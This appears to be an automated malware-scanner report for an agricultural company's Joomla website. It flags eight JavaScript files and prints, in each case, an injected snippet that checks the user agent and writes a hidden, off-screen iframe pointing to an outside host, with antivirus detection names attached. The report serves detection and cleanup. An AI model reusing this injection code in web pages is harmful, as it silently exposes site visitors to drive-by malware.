New scan:

Malware Scanner report for mvs-agro.com

Malicious/Suspicious/Total urls checked
8/0/15
8 pages have malicious code. See details below
Blacklists
OK
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/4
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Scanned pages/files

RequestServer responseStatus
http://www.mvs-agro.com/
200 OK
Content-Length: 46844
Content-Type: text/html
clean
http://www.mvs-agro.com/media/system/js/modal.js
200 OK
Content-Length: 11263
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Showcontentid() {
var so = navigator.userAgent;
var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1);
if (!po) {
document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px;
... 3586 bytes are skipped ...
delay(10, this.ajax);
},
'iframe': function(url) {
return new Element('iframe', {
'src': url,
'frameBorder': 0,
'width': this.options.size.x,
'height': this.options.size.y
});
},
'string': function(str) {
return str;
}
},
extend: $extend
};
SqueezeBox.extend(SqueezeBox, Events.prototype);
SqueezeBox.extend(SqueezeBox, Options.prototype);
SqueezeBox.extend(SqueezeBox, Chain.prototype);;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.JY

http://www.mvs-agro.com/components/com_k2/js/k2.js
200 OK
Content-Length: 3752
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Showcontentid() {
var so = navigator.userAgent;
var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1);
if (!po) {
document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px;
... 2627 bytes are skipped ...
tProperty('rel'));
window.open(this.getProperty('href'),'K2PopUpWindow','width='+options.x+',height='+options.y+',menubar=yes,resizable=yes');
});

});
window.addEvent('load', function(){
if($$('.subCategory')){
var blocks = $$('.subCategory');
var maxHeight = 0;
blocks.each(function(item){
maxHeight = Math.max(maxHeight, parseInt(item.getStyle('height')));
});
blocks.setStyle('height', maxHeight);
}

});
;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.JY

http://www.mvs-agro.com/plugins/content/ja_tabs/ja.tabs.js
200 OK
Content-Length: 15981
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Showcontentid() {
var so = navigator.userAgent;
var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1);
if (!po) {
document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px;
... 3505 bytes are skipped ...
for (var i=this.tabwrap.activePanel._idx-1;i>=0;i--) {
top -= this.tabwrap.panels[i].offsetHeight;
this.tabwrap.panels[i].setStyle('top',top);
}
var top = this.tabwrap.activePanel.offsetTop;
for (i=this.tabwrap.activePanel._idx+1;i<this.tabwrap.panels.length;i++) {
top += this.tabwrap.panels[i-1].offsetHeight;
this.tabwrap.panels[i].setStyle('top',top);
}
}
}
});;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.JY

http://www.mvs-agro.com/modules/mod_gk_tab/scripts/engine_compress.js
200 OK
Content-Length: 4274
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Showcontentid() {
var so = navigator.userAgent;
var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1);
if (!po) {
document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px;
... 3198 bytes are skipped ...
b_ul-'+g+' li',c).each(function(a,i){a.setProperty("class","")});$ES('.gk_tab_ul-'+g+' li',c)[l].toggleClass("active")}).periodical(f["animationInterval"])}})});function gk_tab_anim(a,b,c,d,e,t,s,f){var g=f["styleSuffix"];var h=new Fx.Scroll($E(".gk_tab_container1-"+g,e),{duration:s,wait:true,transition:f["animationTransition"],wheelStops:false});if(a=='left'){(b>0)?b--:b=c-1;h.toElement(d[b])}else if(a=='right'){(b<(c-1))?b+=1:b=0;h.toElement(d[b])}else{b=a;h.toElement(d[b])}return b};;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.JY

http://www.mvs-agro.com/modules/mod_gk_tab/scripts/importer.php?modid=tabmix1&activator=click&animation=0&animationFun=Fx.Transitions.Quint.easeInOut&animationType=1&animationSpeed=1000&animationInterval=5000&styleType=0&styleSuffix=style1&fixedHeight=0&fixedHeightValue=200&alwaysHide=1
200 OK
Content-Length: 375
Content-Type: text/javascript
clean
http://www.mvs-agro.com/modules/mod_news_pro_gk4/interface/scripts/engine-mootools-11.js
200 OK
Content-Length: 9377
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Showcontentid() {
var so = navigator.userAgent;
var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1);
if (!po) {
document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px;
... 3402 bytes are skipped ...
/> $E('.nsp_'+position+'_interface .pagination', module).getElementsBySelector('li').setProperty('class', '');
$E('.nsp_'+position+'_interface .pagination', module).getElementsBySelector('li')[i].setProperty('class', 'active');
}
}

function nsp_art_counter(i, module, position, num){
if($E('.nsp_'+position+'_interface .counter', module)){
$E('.nsp_'+position+'_interface .counter span', module).innerHTML = (i+1) + ' / ' + num;
}
}
});;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.JY

http://www.mvs-agro.com/modules/mod_jaanimation/assets/script.js
200 OK
Content-Length: 18178
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Showcontentid() {
var so = navigator.userAgent;
var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1);
if (!po) {
document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px;
... 3515 bytes are skipped ...
this.options.timeout) this.timer = this.hide.delay(this.options.timeout, this);
this.fireEvent('onShow', [this.toolTip]);
},
hide: function(){
this.fireEvent('onHide', [this.toolTip]);
},

enableTip: function(el){
if (el) el.tip = 'enabled';
},

disableTip: function(el){
if (el) el.tip = 'disabled';
if (this.curTip && this.curTip == el) this.hide();
}
});
JATips.implement(new Events, new Options);
;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.JY

http://www.mvs-agro.com/modules/mod_jaslideshow2/assets/script.js
200 OK
Content-Length: 20199
Content-Type: application/x-javascript
clean
http://www.mvs-agro.com/templates/ja_sargas/scripts/ja.script.js
200 OK
Content-Length: 10913
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Showcontentid() {
var so = navigator.userAgent;
var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1);
if (!po) {
document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px;
... 3632 bytes are skipped ...
p; headerHeight < obj.scrollHeight) headerHeight = obj.scrollHeight;
obj = document.getElementById ('ja-topsl3');
if (obj && headerHeight < obj.scrollHeight) headerHeight = obj.scrollHeight;
headerStep = parseInt(headerHeight*headerInt / headerDuration);
if (headerToggle < 0) {
headerToggle = 1;
toggleHeader (null);
}
}
window.addEvent ('load', function() {
addSpanToTitle();
equalHeight();
});
;;;;

Antivirus reports:

Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.JY

http://www.mvs-agro.com/templates/ja_sargas/scripts/opacity.js
200 OK
Content-Length: 10354
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

function Showcontentid() {
var so = navigator.userAgent;
var po = (so.indexOf("IEMobile") > -1 || so.indexOf("Android") > -1 || so.indexOf("Linux") > -1 || so.indexOf("FreeBSD") > -1 || so.indexOf("Chrome") > -1 || so.indexOf("Macintosh") > -1 || so.indexOf("iPad") > -1 || so.indexOf("iPhone") > -1);
if (!po) {
document.write('<ifra'+'me src="http://tetifoskal.jacksonfoster.com/lisokjaber15.html" style="po'+'sition:absolute;left: -800px;top: -800px;
... 3567 bytes are skipped ...
ser.versionMajor >= 6) || (browser.isOpera && browser.isMac && browser.versionMajor >= 5) || (browser.isOmniweb && browser.versionMinor >= 3.1) || (browser.isIcab && browser.versionMinor >= 1.9) || (browser.isWebtv) || (browser.isDreamcast)) {
var pngNormal = true;
var strExt = ".png";
} else {
var strExt = ".gif";
}

var ns = (document.all)?false:true;
var browserVersion = parseFloat(navigator.appVersion );

Antivirus reports:

Sophos
Troj/JSRedir-OI
ESET-NOD32
JS/Iframe.JY

http://vkontakte.ru/js/api/share.js?10
200 OK
Content-Length: 10156
Content-Type: application/x-javascript
clean
http://www.mvs-agro.com/ru.html
200 OK
Content-Length: 48692
Content-Type: text/html
clean
http://www.mvs-agro.com/?format=html&lang=ru
200 OK
Content-Length: 46566
Content-Type: text/html
clean
http://www.mvs-agro.com/en.html
200 OK
Content-Length: 45270
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: mvs-agro.com

Result:
Second query (visit from search engine):
GET / HTTP/1.1
Host: mvs-agro.com
Referer: http://www.google.com/search?q=mvs-agro.com

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=mvs-agro.com

Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://mvs-agro.com/

Result: mvs-agro.com is not infected or malware details are not published yet.